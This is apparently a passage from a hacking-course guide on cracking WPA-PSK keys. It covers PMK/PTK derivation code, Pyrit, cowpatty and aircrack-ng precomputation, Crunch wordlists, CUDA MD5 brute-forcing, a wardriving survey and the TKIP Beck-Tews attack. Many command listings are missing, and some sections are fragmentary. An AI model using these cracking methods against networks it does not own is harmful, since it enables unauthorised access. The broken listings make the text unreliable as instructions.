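    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        block = label + b"\x00" + data + bytes([counter])
        out += hmac.new(key, block, hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes,
               anonce: bytes, snonce: bytes, nbytes: int = 64) -> bytes:
    """PTK from the PMK, the fixed string, both MAC addresses and both nonces.

    nbytes=64 gives the 512-bit key used with TKIP, nbytes=48 the 384-bit
    key used with CCMP. Sorting the inputs lets both sides compute the same key.
    """
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, nbytes)


def split_ptk(ptk: bytes) -> dict:
    """Break the PTK into its component keys (MIC keys exist only for TKIP)."""
    return {"KCK": ptk[0:16], "KEK": ptk[16:32], "TK": ptk[32:48], "MIC keys": ptk[48:]}


def measure_pmk_rate(samples: int = 20) -> float:
    """PMK derivations per second on this machine (single core, constructed inputs)."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"constructed-{i:04d}", "NETGEAR")
    return samples / (time.perf_counter() - start)


def years_to_exhaust(candidates: int, pmk_per_second: float) -> float:
    """Worst-case time to test every candidate passphrase at a given rate."""
    return candidates / pmk_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    pmk = derive_pmk("password", "IEEE")
    print("PMK (ESSID IEEE)   :", pmk.hex())
    # The ESSID is the salt: the same passphrase under another ESSID gives an
    # unrelated PMK, so a precomputed table only helps against the ESSID it
    # was built for. A unique ESSID removes that shortcut.
    print("PMK (ESSID NETGEAR):", derive_pmk("password", "NETGEAR").hex())

    # Constructed sample handshake values.
    ap, client = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    for name, key in split_ptk(derive_ptk(pmk, ap, client, anonce, snonce)).items():
        print(f"{name:8}: {key.hex()}")

    print(f"local rate: {measure_pmk_rate():.0f} PMK/s")
    spaces = {
        "nameXX pattern, one name": 100,
        "8 lowercase letters": 26 ** 8,
        "12 mixed alphanumerics": 62 ** 12,
    }
    # Rates quoted in this text: CPU average and Pyrit passthrough.
    for rate in (100, 1910.69):
        for label, size in spaces.items():
            print(f"{rate:>8} PMK/s  {label:26} {years_to_exhaust(size, rate):.3g} years")
```

The passphrase policy is what decides the outcome: a guessable pattern falls in seconds at any of these rates, while a long random passphrase stays out of reach even with precomputation.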
The hash function has the task of processing input (key and ESSID)
in such a way that its result cannot be determined in any way other
than executing it. Besides, it is, or at least is supposed to be, non-invertible,
which means that no information about the input should be derived
from the output. But before we go on to learn more about hash
functions, first let’s see a simple implementation of a brute force
attack against WPA.
The parameters:
The parameters:
The speed of this attack is very low, although it can be boosted with
the use of ‘rainbow tables’. Rainbow tables is a misleading name in
this context, however. We are going to use a simple table containing
precomputed hashes (our PBKDF2 outputs) and the data used
to generate them (ESSID + password) as input in cowpatty and
aircrack-ng attacks.
Rainbow tables
High quality rainbow tables can considerably fast-track WPA
cracking. First, an explanation of hash functions (as used in WPA,
for example PBKDF2 or MD5) and how to defeat them. Hashing
transforms a string into a fixed-length value called a hash or
message digest. A 64-bit hash function outputs a 64-bit hash.
A peculiar property of these functions is that they are ‘suspected’ of
being one-way, which means that we still cannot engineer a reverse
function to derive the original text from a hash. On the other hand,
cracking options are not plenty for hash functions, with brute force,
collision and rainbow tables as your choices.
That said, the first of these methods is almost painfully slow. While
in theory you could prepare a table storing all hashes and their
plaintexts, let’s see how big the hash table for a 64-bit function would
need to be. There are 2^64 possible hashes, each 64 bits (8 bytes) in
size. Overall, it’s 2^64 * 2^3 B = 2^57 KB = 2^47 MB = 2^37 GB = 2^27 TB, or
roughly 134 million terabytes! A 1 TB hard drive costs about 100
dollars, so to store your table you would need to cough up more than
13 billion.
The newest of the attack methods are rainbow tables that have
the advantage of saving storage space at the cost of using more
common ESSIDs used in the USA (1,000 values, for example) and
use a common password dictionary.
Cowpatty attack
This cowpatty dictionary attack tries to decrypt a captured four-way
handshake (stored in the test-01.cap file) using a precomputed hash
database (hackingschool).
Where:
Where:
The parameters:
The response:
importReading header...
Reading...
Updating references...
Writing...
CUDA-powered attacks
Chapter outline:
1. What is CUDA?
2. Drivers and development environment configuration
3. CUDA in action: WLAN attacks
4. Appendix A: CUDA-powered cracking of MD4/MD5 hashes
5. Appendix B: Wardriving experiment
What is CUDA?
CUDA (the Compute Unified Device Architecture) is
a parallel computing platform developed by NVIDIA
and implemented in newer models of multi-core
NVIDIA GPUs. For a full list of CUDA-enabled GPUs, see
http://en.wikipedia.org/wiki/CUDA#Supported_GPUs
NVIDIA drivers
To ensure every operation in this section executes properly, first
configure your platform to meet our requirements.
All essential drivers and tools can be downloaded from our site
and installed in the Training Operating System v2.0 using this
command:
Note. If you are not running the Training Operating System v2.0
included, we cannot guarantee the tools are compatible with your
system. The package contains source code of all applications,
however note that compilation and setup details can vary slightly
from case to case.
Committing changes...
Preparing ############################## [100%]
Updating / installing
libxfixes3-devel-4.0.3-2pclos2007.i586 ############################## [100%]
libice6-devel-1.0.4-3pclos2007.i586 ############################## [100%]
libsm6-devel-1.0.3-2pclos2007.i586 ############################## [100%]
libxdamage-devel-1.1.1-2pclos2007.i586 ############################## [100%]
libxxf86vm-devel-1.0.1-4pclos2007.i586 ############################## [100%]
libmesagl1-devel-7.0.2-1pclos2007.i586 ############################## [100%]
libxt6-devel-1.0.5-2pclos2007.i586 ############################## [100%]
libxmu6-devel-1.0.4-1pclos2007.i586 ############################## [100%]
libmesaglu1-devel-7.0.2-1pclos2007.i58 ############################## [100%]
Status: Before uninstall, this module version was ACTIVE on this kernel.
nvidia-current.ko.gz:
- Uninstallation
- Deleting from: /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
- Original module
- No original module was found for this module on this kernel.
- Use the dkms install command to reinstall any previous module version.
------------------------------
Deleting module version: 177.82-1pclos2007
completely from the DKMS tree.
------------------------------
Done.
Stopping atd: [ OK ]
Starting atd: [ OK ]
Cleaning up / removing
dkms-nvidia-current-177.82-1pclos2007. ############################## [100%]
nvidia_177.xx-177.82-1pclos2007.i586 ############################## [100%]
Using `/etc/nvidia-current/ld.so.conf’ to provide `gl_conf’.
Building module:
nvidia-current.ko.gz:
- Original module
- No original module exists within this kernel
- Installation
- Installing to /lib/modules/2.6.26.8.tex3/kernel/drivers/char/drm/
depmod.......
========================================
========================================
In the next step, move to the SDK directory and compile the sources.
The platform has been installed. Let’s see if it runs properly by using
the SDK sample codes.
Test PASSED
As you can see in the listing above, the device and CUDA drivers
have been detected. SDK and CUDA-Toolkit are running and ready
to use when needed.
http://docs.nvidia.com/cuda/index.html
Cowpatty
Cowpatty is a dictionary cracker that can be used to defeat a wireless
key. It makes use of a submitted passphrase and ESSID list or
a precomputed hash table.
Installation
Navigate again to the cuda-ext directory:
Pyrit
Installation
Pyrit is a WPA-PSK and WPA2-PSK cracker available for free under
the GNU General Public License, and currently is the most efficient
tool to exploit multicore platforms and the following technologies:
ATI-Stream, NVIDIA CUDA, OpenCL and VIA Padlock. Within
the scope of this work, we focus on CUDA.
Navigate to cuda-ext:
...
...
#1: ‘CUDA-Device #1 ‘GeForce 9600M GT’’: 1472.8 PMKs/s (Occ. 99.4%; RTT 2.9)
#2: ‘CPU-Core (SSE2)’: 417.1 PMKs/s (Occ. 96.4%; RTT 2.9)
1472 PMKs/s on this mobile video card is not striking but still it’s
a triple improvement in performance compared to the results of
the Core 2 Duo 2 GHz CPU.
Options
-e
-f
Commands
batch
Translates all database passwords into their PMKs and writes
them to the database. Add the -e option to restrict this command
to a single ESSID. All ESSIDs in the database will be processed if
it is skipped.
Example:
pyrit -e NETGEAR batch
benchmark
Determines the peak-performance of the available hardware by
computing dummy-results.
Example:
pyrit benchmark
create_essid
Adds a new ESSID given by the -e option to the database.
Example:
pyrit -e NETGEAR create_essid
delete_essid
Deletes an ESSID specified by the -e option.
Example:
pyrit -e NETGEAR delete_essid
eval
Counts all available passwords and the results for every ESSIDs
stored in the database.
Example:
pyrit eval
export_cowpatty
Writes the results for an ESSID specified by -e to a file specified
by the -f option in cowpatty format. Note that existing files will
be overwritten without a confirmation prompt.
Example:
pyrit -f NETGEAR.cow -e NETGEAR export_cowpatty
export_hashdb
Example:
pyrit -f NETGEAR.db -e NETGEAR export_hashdb
export_passwords
Writes all passwords stored in the database to a new file given
in -f. Note that existing files will be overwritten without
a confirmation prompt.
Example:
pyrit -f myword.txt.gz export_passwords
import_passwords
Reads passwords from the file given in -f to the database.
The passwords may contain all characters except for the newline
character \n. The passwords that cannot be used to crack
WPA-/WPA2-PSK will be omitted. Pyrit will only import
passwords and ignore duplicates.
Example:
pyrit -f dirty_words.txt import_passwords
list_cores
Prints the available hardware.
Example:
pyrit list_cores
list_essids
Prints all available ESSIDs stored in the database. The function
is faster than eval when you do not need to know the number of
computed results for each respective ESSID.
Example:
pyrit list_essids
passthrough
Reads passwords from a file given in -f and computes their
PMKs for an ESSID given in -e. The results are printed directly
to the output file in cowpatty format and are not stored in the
database.
Example:
pyrit -f dirty_words.txt.gz -e NETGEAR passthrough |
cowpatty -d - -r wpatestcapture.cap -s NETGEAR
selftest
Runs a 60-second selftest to check the hardware printed
by list_cores. The command may detect broken hardware.
Example:
pyrit selftest
verify
Randomly selects 10% of the results stored in the database and
recomputes them to verify their accuracy. The option can be used
in the case of a suspected hardware corruption.
Example:
pyrit -e NETGEAR verify
Aircrack-ng
An already familiar name, aircrack-ng is a suite of utilities designed
to execute a variety of attacks on wireless networks, from packet
capture and injection to WEP and WPA key cracking.
Installation
The following steps demonstrate how to install the latest stable
aircrack-ng package version with CUDA and sqlite support.
Section "Device"
    Identifier "Videocard1"
    Driver "nvidia"
    VendorName "NVIDIA Corporation"
    BoardName "GeForce 9600M GT"
    BusID "PCI:3:0:0"
    Screen 1
    Option "AddARGBGLXVisuals" "true"
Add the Option “Coolbits” “1” line exactly like in the example above
and save the file using F2. Press Esc to quit the editor. After the
changes are made, you need to restart the X server.
You can now arbitrarily change GPU and Memory clock rates.
The other option is to use nvclock. First, you need to compile and
install the utility in your system.
Installing nvclock
Move to the cuda-ext directory containing the archive. Unpack it.
-- Shader info --
Clock: 675.000 MHz
Stream units: 32 (00011b)
ROP units: 8 (00000011b)
-- Memory info --
Amount: 512 MB
Type: 128 bit DDR2
Clock: 799.200 MHz
-- PCI-Express info --
Current Rate: 1X
Maximum rate: 16X
-- Smartdimmer info --
Backlight level: 0%
-- Sensor info --
Sensor: GPU Internal Sensor
GPU temperature: 59C
-- VideoBios information --
Version: 62.94.1a.00.19
Signon message: G96 E566 NB9P-GS VGA BIOS
Performance level 0: gpu 275MHz/shader 550MHz/memory 250MHz/0.89V/100%
Performance level 1: gpu 400MHz/shader 800MHz/memory 400MHz/0.89V/100%
Performance level 2: gpu 500MHz/shader 1250MHz/memory 400MHz/1.05V/100%
VID mask: 3
Voltage level 0: 0.89V, VID: 1
Voltage level 1: 1.05V, VID: 0
Tweaking options:
Hardware options:
Test platform
All attacks presented below have been run on a midrange laptop
with the following specs:
Operating system:
Test files
The cuda-ext.tar.bz2 archive contains (in the hackme directory)
samples that have been used in the attacks below. These samples
are a great opportunity to learn and test your skills in a practical
environment.
List of files:
The parameters:
The parameters:
The first, and the slower of the two, requires an attacker to wait for
a user to connect with a wireless network.
Where:
Wait for the client to reconnect to the AP. Use aircrack-ng to check if
you have successfully captured the four-way handshake:
Where:
Note. The example uses a capture file found in the test resources.
If you have your own captures to process, adjust the filename
accordingly.
[root@localhost hackme]# aircrack-ng wpa-hackme-01.cap
Opening wpa-hackme-01.cap
Read 17068 packets.
As you see, 1 handshake has been captured. You can now move to
the next stages in cracking the test network’s key.
Passthrough mode
As described, Pyrit can compute PMKs on the fly and pass them as
input to cowpatty, which verifies the correctness of the hashes.
Where:
The key has been found. The achieved rate is 1910 passwords per
second, and the key is recovered in about 4 minutes in a search space
of more than 450 thousand passphrases.
Where:
Where:
...
If you want to see the currently stored ESSIDs in the database, you
can run this command:
The parameters:
...
With all needed data loaded, you can start batch processing and
generate PMKs for the database. This can take some time depending
on the size of the used dictionary, but with CUDA, processing
should be even up to 100 times faster than the standard CPU
processing.
...
The data has been processed in a batch, and you can export the
computed PMK database both to cowpatty and aircrack-ng formats.
Both will be looked at; we will also showcase the two crackers.
The parameters:
Exporting to ‘dict_hash.cowpatty’...
473986 entries written. All done.
You can now begin to crack the key using the exported table.
The parameters:
The parameters:
Master Key : D9 0D D5 39 05 27 10 23 DA D0 D9 1F B9 A6 34 74
1B 2C 01 81 F5 9F 3A E4 42 B4 01 EA 72 2F F0 07
Transient Key : 1C C0 26 E8 25 AA 23 2A D8 30 97 AD 1E 23 85 16
1F B3 1B F4 98 4E B4 2A 25 E4 B3 B3 75 24 5A B3
3F A1 CC D7 50 A5 55 9F 23 FD E2 FE 20 73 8A 0E
51 E8 E7 24 AD D2 85 6D D6 84 D0 4F 4E 91 EC 1F
EAPOL HMAC : 7D E8 8F 30 8F 5C 31 2C 2D D9 A4 28 46 FE DC 7F
Quitting aircrack-ng...
Airolib-ng
The latest utilities in the aircrack-ng package offer a hash generation
capability similar to Pyrit’s, and consequently if you do not want to
use the Pyrit batch processing, you can instead turn to airolib-ng
for the feature.
The parameters:
Now, import an ESSID list from a file called essid.txt to the database:
The parameters:
Done.
The parameters:
Now, process the data into a hash table necessary to crack the key.
The parameters:
The attacks stop here. However, if you failed to find the key, you
could use bigger and more exhaustive dictionaries for the task.
Benchmark analysis
Key cracking
Tool         Hash computing mode                      Elapsed time [s]  Performance [PMK/s]
cowpatty     No precomputed hashes (dictionary file)  5354,5            86,87
Aircrack-ng  No precomputed hashes (dictionary file)  564               863,08
cowpatty     Passthrough                              243,44            1910,69
cowpatty     Batch processing                         3,9               113825,61
Aircrack     Batch processing                         3                 49765,98
If you plan to crack (your) networks with the same ESSIDs, batch
processing is a better choice. The batch mode requires you to process
hash tables only once, without needing to repeat the time-intensive
procedure with each new attack. Cracking itself should be swift.
Still, it is up to you to choose the method.
Right now, Pyrit is the fastest tool for generating hash tables from
password dictionaries and ESSID lists. It is more than ten times
faster than airolib-ng. While the performance of the utilities in
their upcoming versions is an unknown, Pyrit seems like the better
choice at this moment.
Dictionaries
Crunch is a popular utility that can do just that. You can send
the generated output to Pyrit or save it to a file.
Installation
The cuda-ext directory contains an archive with the tool. Unpack it.
or,
numeric = [0123456789]
numeric-space = [0123456789 ]
ualpha = [ABCDEFGHIJKLMNOPQRSTUVWXYZ]
ualpha-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ]
ualpha-numeric = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]
ualpha-numeric-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ]
ualpha-numeric-symbol14 = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=]
ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+
= ]
ualpha-numeric-all = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/]
ualpha-numeric-all-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=
~`[]{}|\:;”’<>,.?/ ]
lalpha = [abcdefghijklmnopqrstuvwxyz]
lalpha-space = [abcdefghijklmnopqrstuvwxyz ]
lalpha-numeric = [abcdefghijklmnopqrstuvwxyz0123456789]
lalpha-numeric-space = [abcdefghijklmnopqrstuvwxyz0123456789 ]
lalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzäöüß0123456789!@#$%
^&*()-_+=”]
lalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzäöüß0
123456789!@#$%^&*()-_+=” ]
lalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzäöüß
0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
lalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzäöüß0123456789
!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
mixalpha = [abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ]
mixalpha-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ ]
mixalpha-numeric = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVW
XYZ0123456789]
mixalpha-numeric-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
WXYZ0123456789 ]
mixalpha-numeric-symbol14 = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=]
mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOP
QRSTUVWXYZ0123456789!@#$%^&*()-_+= ]
mixalpha-numeric-all = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ
RSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/]
mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
UVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;”’<>,.?/ ]
Examples
Let’s build a list of words 5 to 6 characters long, with only lowercase
alphanumeric characters allowed.
Wordlist.txt is the output dictionary file. If you need to, you can
define custom charsets in charset.lst.
Less experienced users have a bad habit of using a first name and
two digits denoting a birth year for passwords. The fixed pattern is
nameXX (X – digit). Thanks to crunch, you can effortlessly create
a list of possible passwords matching a given template for the name
Andrew:
andrew00
andrew01
...
andrew99
What is MD5?
MD5 is a commonly used cryptographic hash function that can
transform any input into an encoded 128-bit hash. A widespread
application of MD5 is using it to verify the correctness of files, for
example packages downloaded from the Internet. By generating a
hash of the download and a hash of the original file, you can quickly
see if they match and whether the download could be corrupted.
Here’s the MD5 hash for the phrase ‘Hacking School Rulez’.
Brute force can be used to defeat MD5. That said, this process can be
quite time-consuming if the password to crack is long. Now, we are
going to test the Multiforcer and MD5 GPU Crack applications (both
make use of the advanced CUDA computing capability) and see how
they perform with hashes like these.
CUDA-Multiforcer
CUDA-Multiforcer belongs to the most efficient MD4/MD5 and
NTLM hash cracking platforms. A GPU with CUDA support brings
the utility up to its full potential.
Installation
Compile the Argtable library to be able to set up Multiforcer.
All the extensions can be found inside cuda-ext. Unpack
argtable2-11.tar.gz.
When this is done, you can move on to the tool proper. Unpack
Multiforcer.
[root@localhost argtable2-11]# cd ..
[root@localhost cuda-ext]# tar xfj CUDA-Multiforcer-src-0.7.tar.bz2
Note. You must have SDK installed to build CUDA-Multiforcer. Go
back to ‘Drivers and development environment configuration’ for
tips on how to install SDK.
Copy the Multiforcer directory to NVIDIA SDK and compile the
sources.
Examples
Below are the steps for cracking an MD5 hash. We will use the
sample hashes included in the tool.
Inside test_hashes you’ll find sample files to crack, while charsets
contains files with specified character sets.
The parameters:
Installation
The archive containing the tool can be found inside cuda-ext.
Unpack it.
[options]:
-d <CUDA device ID>: (default: the first CUDA device), see the -l
option to list the CUDA devices in the system
-s <start password>
Examples
We’ll use the benchmark mode to test the performance of
MD5 GPU Crack.
...
Benchmark Start
Using default CUDA GPU device:0
Cuda device ID:0, Device name:GeForce 9600M GT, supporting CUDA:1.1,
multiProcessorCount:4, clockRate:1250.00 MHz, TotalMem:511.69 MB
******* Test 0 Start *******
Expected Password: 1234567890
MD5 Hash:e807f1fcf82d132f9bb018ca6738a19f, Start Password:1200000000,
Total pwd to check:1000000000
Charset used 0:0123456789
MD5 brute force started
Progress 3%, Pwd:1232002520, Instant 45.72 Mhash/s(175.00 ms)
MD5 Cracked pwd=1234567890 hash=e807f1fcf82d132f9bb018ca6738a19f
Instant 47.06 Mhash/s(170.00 ms)
Average 46.52 Mhash/s, Total Time:0.86s(860.00 ms)
MD5 brute force finished
******* Test 0 End *******
Benchmark End
The benchmark shows that GPU MD5 Crack can allow you to crack
MD5 with a speed of 50 to 55 million hashes per second. This rate
is comparable to the results you can achieve with CUDA-Multiforcer.
Hardware
– Netbook Asus eeePC
– Bluetooth GPS
A moving car equipped with that gear enables quick travel and
picking necessary information within just several hours of driving.
Research methodology
Kismet saves discovered wireless network locations. All information
is written in the universal, easy-to-process CSV format. Using the
online app http://www.gpsvisualizer.com, it is possible to create
Results
Here are the most common ESSID names we have obtained in the
experiment.
Rainbow tables for only ten of the most popular ESSID values could
give us access to close to 20% of the tested networks. Other frequent
ESSIDs not on the list are popular first names. After expanding
them to add some common names, rainbow tables can wield a 40%
effectiveness in attacks against the networks in the test group.
Security Found %
None or WEP 575 38.3
WPA-TKIP 345 23
WPA-AES/WPA2 580 38.7
The statistics are alarming. Almost four in ten wireless networks are
open or only use WEP, which provides next to no security, and as we
have proved on these pages, can be broken in a matter of minutes.
23% of networks are protected, but not sufficiently so, only utilizing
the WPA TKIP mechanism that cannot guarantee strong security.
Summary
The experiment demonstrates that many users pay little attention
to securing themselves and their Wi-Fi networks. Most of the
time the communications inside a network could be captured by
an adversary, and over half of the analyzed networks use legacy
security solutions that need to be superseded or need their ESSIDs
reconfigured.
Chapter 7
Chapter outline:
1. WPA TKIP attack
2. WPA TKIP broken
3. Beck-Tews attack enhanced
4. Michael Reset attack
5. Summary
In this part of the lecture, we are going to cover the main points of
the attack. For everything else, consult the original text.
Creating a packet
To understand these additions better, below is a diagram showing
the process of creating an encrypted packet:
[Diagram: TKIP encrypted packet creation. Labels: TA, TK, phase 1 key mixing, TTAK, TSC, phase 2 key mixing, WEP seed (IV + RC4 key), DA, SA, priority, plaintext MSDU data, MIC key, Michael, plaintext MSDU + MIC, fragmentation, MPDU, WEP, encrypted MPDU]
The next phase is a function that mixes the TTAK, the TK and the 16
least significant bits of the TSC. The output is the WEP seed: a 24-bit
initialization vector and a 104-bit RC4 key.
Michael takes the following values as input: the SA, DA, priority
and the MIC. As a result, the TSC and the generated MIC code are
fragmented and passed to the WEP block as plaintext. The rest of the
frame creation process is identical to the WEP encryption.
An encrypted frame:
MAC header | IV / KeyID | Extended IV | Data (PDU) | MIC | ICV | FCS
(Encrypted: Data (PDU), MIC, ICV)
TKIP attack
Having covered the theoretical background of how TKIP
works, let’s now move on to the actual subject of this part of the
lecture. Erik Tews and Martin Beck have demonstrated how
a modified chopchop attack can be used to mount an attack
against TKIP. Implementing the exploit, an aircrack-ng
suite tool has been created for the purpose. Tkiptun-ng can
allow you to run the attack even if you know next to nothing
about the theory behind it. At present the utility is still under
development, and you can check for implementation updates here:
http://www.aircrack-ng.org/doku.php?id=tkiptun-ng
Requirements
There are serious limitations imposed on the attack. An access point
must support Quality of Service (QoS) features to allow for the usage
of the chopchop technique. Without QoS turned on, it would not
Another restriction is the key renewal time. After this time, a new
session key (TK, Temporal Key) is negotiated. As a rule of thumb,
the Key Renewal Interval is set in the AP to 3,600 seconds (an hour).
The attack needs to end under an hour from its start; otherwise it
would need to be executed again from scratch. Compared with the
standard chopchop, the attack takes longer as it has to deal with an
anti-brute force solution, the MIC failure holdoff time mechanism.
Attack stages:
1. Deauthentication
2. Modified chopchop
4. Reversing Michael
[Flowchart of the attack. Labels: START, deauthenticate, "Done chopping bytes?", guess byte, "ICV correct?", "MIC failure?", "Number of guesses < 256?", guess IP address, reverse Michael]
The modified chopchop attack cuts off the last byte and attempts
to guess the encrypted value. If your particular guess is wrong
for a byte, the ICV and MIC values should not be correct and the
Countermeasures
One of the effective remedies against the TKIP attack (without
disabling QoS enhancements) is setting the Key Renewal Interval
low, for example to 120 seconds. This means that no more than
2 bytes can be decrypted using the chopchop attack. Still, protocols other
than WPA with TKIP are preferable, for example WPA2
CCMP, which is based on AES. Even disabling QoS
support offers just a degree of security rather than total protection.
Ohigashi and Morii propose two variants of the MITM attack. The
first model assumes the access point and client cannot hear one
another due to the distance between them.
[Diagrams: positions of the AP, attacker and client in the MITM variants; one diagram is labelled "Directional antenna"]
Keep in mind that the packets flowing in WLANs are mostly ARP
and IPv4 packets. The chopchop exploit in Beck and Tews builds on
ARP packets whose content, as you know, can be easily guessed. The
attack allows you to receive 40 bytes of keystream.
Beck’s new adaptation of the attack uses both ARP and IPv4 packets.
The researcher assumes that the 8-byte LLC header prepending both
IPv4 and ARP packets is fully known.
ARP and IP packets are both prepended with the 8-byte LLC
header, which is fully known. This means you can get another
8 bytes of keystream with no effort. As a result, you can use 12 bytes
of keystream, all recovered simply from the way the IP packet is
constructed.
At initialization, two key words are set that act as the internal state.
Based on the set state (the key words), the next 32-bit words are
generated.
What this implies is that you may be able to add an extra data
fragment to an unknown packet in such a way that the MIC value
for the entire packet does not change. For this to work, you need
to derive two ‘magic words’ that match both the inserted and the
original packet so that the internal state of Michael is reset.
Overall, the essence of the attack is combining two packets in such a way
that an unknown MIC value remains valid for the resultant packet.
Summary
TKIP attacks are still under development, and become more refined
with each passing month. Unfortunately, overcoming one set of
restrictions only leads to adopting even more stringent limitations.
According to the attack’s author, a successful injection of several
hundred data bytes is only possible if a targeted network includes
a Linux-based device and a victim client has open TCP ports.
Summary
The guide has examined the main points of 802.11 and its
successor protocols. You can now name the interrupters in popular
WLANs, and have learned the measures preventing intrusions
and encryption algorithms used in Wi-Fi networks. You also
should be more fully aware of the perils facing wireless users and
administrators, and can quickly break into WEP networks in
a variety of ways. We have also shown you several WPA exploits
which are not effective yet.
References
10. http://www.aircrack-ng.org/
11. http://dl.aircrack-ng.org/breakingwepandwpa.pdf
12. http://packetstormsecurity.com/files/80654/A-Practical-Message-Falsification-Attack-On-WPA.html
13. http://download.aircrack-ng.org/wiki-files/doc/enhanced_tkip_michael.pdf